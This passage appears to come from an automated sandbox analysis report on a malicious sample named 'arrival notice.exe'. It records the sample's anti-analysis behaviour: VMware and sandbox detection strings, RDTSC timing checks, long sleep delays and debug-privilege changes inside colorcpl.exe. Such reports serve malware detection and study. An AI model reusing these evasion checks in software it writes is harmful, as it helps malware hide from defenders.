          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: arrival notice.exe PID: 6224, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: arrival notice.exe, 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: arrival notice.exe, 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\arrival notice.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\arrival notice.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 00000000009685F4 second address: 00000000009685FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 000000000096898E second address: 0000000000968994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\arrival notice.exe TID: 6228Thread sleep time: -33182s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exe TID: 4552Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6696Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_004088C0 rdtsc 3_2_004088C0
          Source: C:\Users\user\Desktop\arrival notice.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeThread delayed: delay time: 33182Jump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000004.00000000.438230835.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.395290671.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.432225748.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: arrival notice.exe, 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000004.00000000.438230835.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: arrival notice.exe, 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: arrival notice.exe, 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000004.00000000.432225748.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: arrival notice.exe, 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000004.00000000.436880664.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: arrival notice.exe, 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: arrival notice.exe, 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: arrival notice.exe, 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: arrival notice.exe, 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000004.00000000.436880664.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000004.00000000.395290671.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000004.00000000.403044652.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_004088C0 rdtsc 3_2_004088C0
          Source: C:\Users\user\Desktop\arrival notice.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7F0BF mov ecx, dword ptr fs:[00000030h]10_2_04B7F0BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7F0BF mov eax, dword ptr fs:[00000030h]10_2_04B7F0BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7F0BF mov eax, dword ptr fs:[00000030h]10_2_04B7F0BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C18CD6 mov eax, dword ptr fs:[00000030h]10_2_04C18CD6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B890AF mov eax, dword ptr fs:[00000030h]10_2_04B890AF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B720A0 mov eax, dword ptr fs:[00000030h]10_2_04B720A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B720A0 mov eax, dword ptr fs:[00000030h]10_2_04B720A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B720A0 mov eax, dword ptr fs:[00000030h]10_2_04B720A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B720A0 mov eax, dword ptr fs:[00000030h]10_2_04B720A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B720A0 mov eax, dword ptr fs:[00000030h]10_2_04B720A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B720A0 mov eax, dword ptr fs:[00000030h]10_2_04B720A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B5849B mov eax, dword ptr fs:[00000030h]10_2_04B5849B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B49080 mov eax, dword ptr fs:[00000030h]10_2_04B49080
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC3884 mov eax, dword ptr fs:[00000030h]10_2_04BC3884
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC3884 mov eax, dword ptr fs:[00000030h]10_2_04BC3884
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C014FB mov eax, dword ptr fs:[00000030h]10_2_04C014FB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC6CF0 mov eax, dword ptr fs:[00000030h]10_2_04BC6CF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC6CF0 mov eax, dword ptr fs:[00000030h]10_2_04BC6CF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC6CF0 mov eax, dword ptr fs:[00000030h]10_2_04BC6CF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B458EC mov eax, dword ptr fs:[00000030h]10_2_04B458EC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BDB8D0 mov eax, dword ptr fs:[00000030h]10_2_04BDB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BDB8D0 mov ecx, dword ptr fs:[00000030h]10_2_04BDB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BDB8D0 mov eax, dword ptr fs:[00000030h]10_2_04BDB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BDB8D0 mov eax, dword ptr fs:[00000030h]10_2_04BDB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BDB8D0 mov eax, dword ptr fs:[00000030h]10_2_04BDB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BDB8D0 mov eax, dword ptr fs:[00000030h]10_2_04BDB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7002D mov eax, dword ptr fs:[00000030h]10_2_04B7002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7002D mov eax, dword ptr fs:[00000030h]10_2_04B7002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7002D mov eax, dword ptr fs:[00000030h]10_2_04B7002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7002D mov eax, dword ptr fs:[00000030h]10_2_04B7002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7002D mov eax, dword ptr fs:[00000030h]10_2_04B7002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7BC2C mov eax, dword ptr fs:[00000030h]10_2_04B7BC2C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B5B02A mov eax, dword ptr fs:[00000030h]10_2_04B5B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B5B02A mov eax, dword ptr fs:[00000030h]10_2_04B5B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B5B02A mov eax, dword ptr fs:[00000030h]10_2_04B5B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B5B02A mov eax, dword ptr fs:[00000030h]10_2_04B5B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC7016 mov eax, dword ptr fs:[00000030h]10_2_04BC7016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC7016 mov eax, dword ptr fs:[00000030h]10_2_04BC7016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC7016 mov eax, dword ptr fs:[00000030h]10_2_04BC7016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C02073 mov eax, dword ptr fs:[00000030h]10_2_04C02073
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C11074 mov eax, dword ptr fs:[00000030h]10_2_04C11074
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC6C0A mov eax, dword ptr fs:[00000030h]10_2_04BC6C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC6C0A mov eax, dword ptr fs:[00000030h]10_2_04BC6C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC6C0A mov eax, dword ptr fs:[00000030h]10_2_04BC6C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC6C0A mov eax, dword ptr fs:[00000030h]10_2_04BC6C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C01C06 mov eax, dword ptr fs:[00000030h]10_2_04C01C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C01C06 mov eax, dword ptr fs:[00000030h]10_2_04C01C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C01C06 mov eax, dword ptr fs:[00000030h]10_2_04C01C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C01C06 mov eax, dword ptr fs:[00000030h]10_2_04C01C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C01C06 mov eax, dword ptr fs:[00000030h]10_2_04C01C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C01C06 mov eax, dword ptr fs:[00000030h]10_2_04C01C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C01C06 mov eax, dword ptr fs:[00000030h]10_2_04C01C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C01C06 mov eax, dword ptr fs:[00000030h]10_2_04C01C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C01C06 mov eax, dword ptr fs:[00000030h]10_2_04C01C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C01C06 mov eax, dword ptr fs:[00000030h]10_2_04C01C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C01C06 mov eax, dword ptr fs:[00000030h]10_2_04C01C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C01C06 mov eax, dword ptr fs:[00000030h]10_2_04C01C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C01C06 mov eax, dword ptr fs:[00000030h]10_2_04C01C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C01C06 mov eax, dword ptr fs:[00000030h]10_2_04C01C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C1740D mov eax, dword ptr fs:[00000030h]10_2_04C1740D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C1740D mov eax, dword ptr fs:[00000030h]10_2_04C1740D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C1740D mov eax, dword ptr fs:[00000030h]10_2_04C1740D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C14015 mov eax, dword ptr fs:[00000030h]10_2_04C14015
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C14015 mov eax, dword ptr fs:[00000030h]10_2_04C14015
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B6746D mov eax, dword ptr fs:[00000030h]10_2_04B6746D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B60050 mov eax, dword ptr fs:[00000030h]10_2_04B60050
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B60050 mov eax, dword ptr fs:[00000030h]10_2_04B60050
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BDC450 mov eax, dword ptr fs:[00000030h]10_2_04BDC450
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BDC450 mov eax, dword ptr fs:[00000030h]10_2_04BDC450
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7A44B mov eax, dword ptr fs:[00000030h]10_2_04B7A44B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B71DB5 mov eax, dword ptr fs:[00000030h]10_2_04B71DB5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B71DB5 mov eax, dword ptr fs:[00000030h]10_2_04B71DB5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B71DB5 mov eax, dword ptr fs:[00000030h]10_2_04B71DB5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC51BE mov eax, dword ptr fs:[00000030h]10_2_04BC51BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC51BE mov eax, dword ptr fs:[00000030h]10_2_04BC51BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC51BE mov eax, dword ptr fs:[00000030h]10_2_04BC51BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC51BE mov eax, dword ptr fs:[00000030h]10_2_04BC51BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B735A1 mov eax, dword ptr fs:[00000030h]10_2_04B735A1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B761A0 mov eax, dword ptr fs:[00000030h]10_2_04B761A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B761A0 mov eax, dword ptr fs:[00000030h]10_2_04B761A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC69A6 mov eax, dword ptr fs:[00000030h]10_2_04BC69A6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C0FDE2 mov eax, dword ptr fs:[00000030h]10_2_04C0FDE2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C0FDE2 mov eax, dword ptr fs:[00000030h]10_2_04C0FDE2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C0FDE2 mov eax, dword ptr fs:[00000030h]10_2_04C0FDE2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C0FDE2 mov eax, dword ptr fs:[00000030h]10_2_04C0FDE2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B72990 mov eax, dword ptr fs:[00000030h]10_2_04B72990
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7FD9B mov eax, dword ptr fs:[00000030h]10_2_04B7FD9B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7FD9B mov eax, dword ptr fs:[00000030h]10_2_04B7FD9B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7A185 mov eax, dword ptr fs:[00000030h]10_2_04B7A185
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B6C182 mov eax, dword ptr fs:[00000030h]10_2_04B6C182
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B72581 mov eax, dword ptr fs:[00000030h]10_2_04B72581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B72581 mov eax, dword ptr fs:[00000030h]10_2_04B72581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B72581 mov eax, dword ptr fs:[00000030h]10_2_04B72581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B72581 mov eax, dword ptr fs:[00000030h]10_2_04B72581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B42D8A mov eax, dword ptr fs:[00000030h]10_2_04B42D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B42D8A mov eax, dword ptr fs:[00000030h]10_2_04B42D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B42D8A mov eax, dword ptr fs:[00000030h]10_2_04B42D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B42D8A mov eax, dword ptr fs:[00000030h]10_2_04B42D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B42D8A mov eax, dword ptr fs:[00000030h]10_2_04B42D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BF8DF1 mov eax, dword ptr fs:[00000030h]10_2_04BF8DF1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B4B1E1 mov eax, dword ptr fs:[00000030h]10_2_04B4B1E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B4B1E1 mov eax, dword ptr fs:[00000030h]10_2_04B4B1E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B4B1E1 mov eax, dword ptr fs:[00000030h]10_2_04B4B1E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BD41E8 mov eax, dword ptr fs:[00000030h]10_2_04BD41E8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B5D5E0 mov eax, dword ptr fs:[00000030h]10_2_04B5D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B5D5E0 mov eax, dword ptr fs:[00000030h]10_2_04B5D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C105AC mov eax, dword ptr fs:[00000030h]10_2_04C105AC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C105AC mov eax, dword ptr fs:[00000030h]10_2_04C105AC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC6DC9 mov eax, dword ptr fs:[00000030h]10_2_04BC6DC9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC6DC9 mov eax, dword ptr fs:[00000030h]10_2_04BC6DC9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC6DC9 mov eax, dword ptr fs:[00000030h]10_2_04BC6DC9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC6DC9 mov ecx, dword ptr fs:[00000030h]10_2_04BC6DC9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC6DC9 mov eax, dword ptr fs:[00000030h]10_2_04BC6DC9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC6DC9 mov eax, dword ptr fs:[00000030h]10_2_04BC6DC9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B53D34 mov eax, dword ptr fs:[00000030h]10_2_04B53D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B53D34 mov eax, dword ptr fs:[00000030h]10_2_04B53D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B53D34 mov eax, dword ptr fs:[00000030h]10_2_04B53D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B53D34 mov eax, dword ptr fs:[00000030h]10_2_04B53D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B53D34 mov eax, dword ptr fs:[00000030h]10_2_04B53D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B53D34 mov eax, dword ptr fs:[00000030h]10_2_04B53D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B53D34 mov eax, dword ptr fs:[00000030h]10_2_04B53D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B53D34 mov eax, dword ptr fs:[00000030h]10_2_04B53D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B53D34 mov eax, dword ptr fs:[00000030h]10_2_04B53D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B53D34 mov eax, dword ptr fs:[00000030h]10_2_04B53D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B53D34 mov eax, dword ptr fs:[00000030h]10_2_04B53D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B53D34 mov eax, dword ptr fs:[00000030h]10_2_04B53D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B53D34 mov eax, dword ptr fs:[00000030h]10_2_04B53D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B4AD30 mov eax, dword ptr fs:[00000030h]10_2_04B4AD30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BCA537 mov eax, dword ptr fs:[00000030h]10_2_04BCA537
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B74D3B mov eax, dword ptr fs:[00000030h]10_2_04B74D3B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B74D3B mov eax, dword ptr fs:[00000030h]10_2_04B74D3B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B74D3B mov eax, dword ptr fs:[00000030h]10_2_04B74D3B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7513A mov eax, dword ptr fs:[00000030h]10_2_04B7513A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7513A mov eax, dword ptr fs:[00000030h]10_2_04B7513A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B64120 mov eax, dword ptr fs:[00000030h]10_2_04B64120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B64120 mov eax, dword ptr fs:[00000030h]10_2_04B64120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B64120 mov eax, dword ptr fs:[00000030h]10_2_04B64120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B64120 mov eax, dword ptr fs:[00000030h]10_2_04B64120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B64120 mov ecx, dword ptr fs:[00000030h]10_2_04B64120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B49100 mov eax, dword ptr fs:[00000030h]10_2_04B49100
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B49100 mov eax, dword ptr fs:[00000030h]10_2_04B49100
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B49100 mov eax, dword ptr fs:[00000030h]10_2_04B49100
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B6C577 mov eax, dword ptr fs:[00000030h]10_2_04B6C577
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B6C577 mov eax, dword ptr fs:[00000030h]10_2_04B6C577
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B4B171 mov eax, dword ptr fs:[00000030h]10_2_04B4B171
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B4B171 mov eax, dword ptr fs:[00000030h]10_2_04B4B171
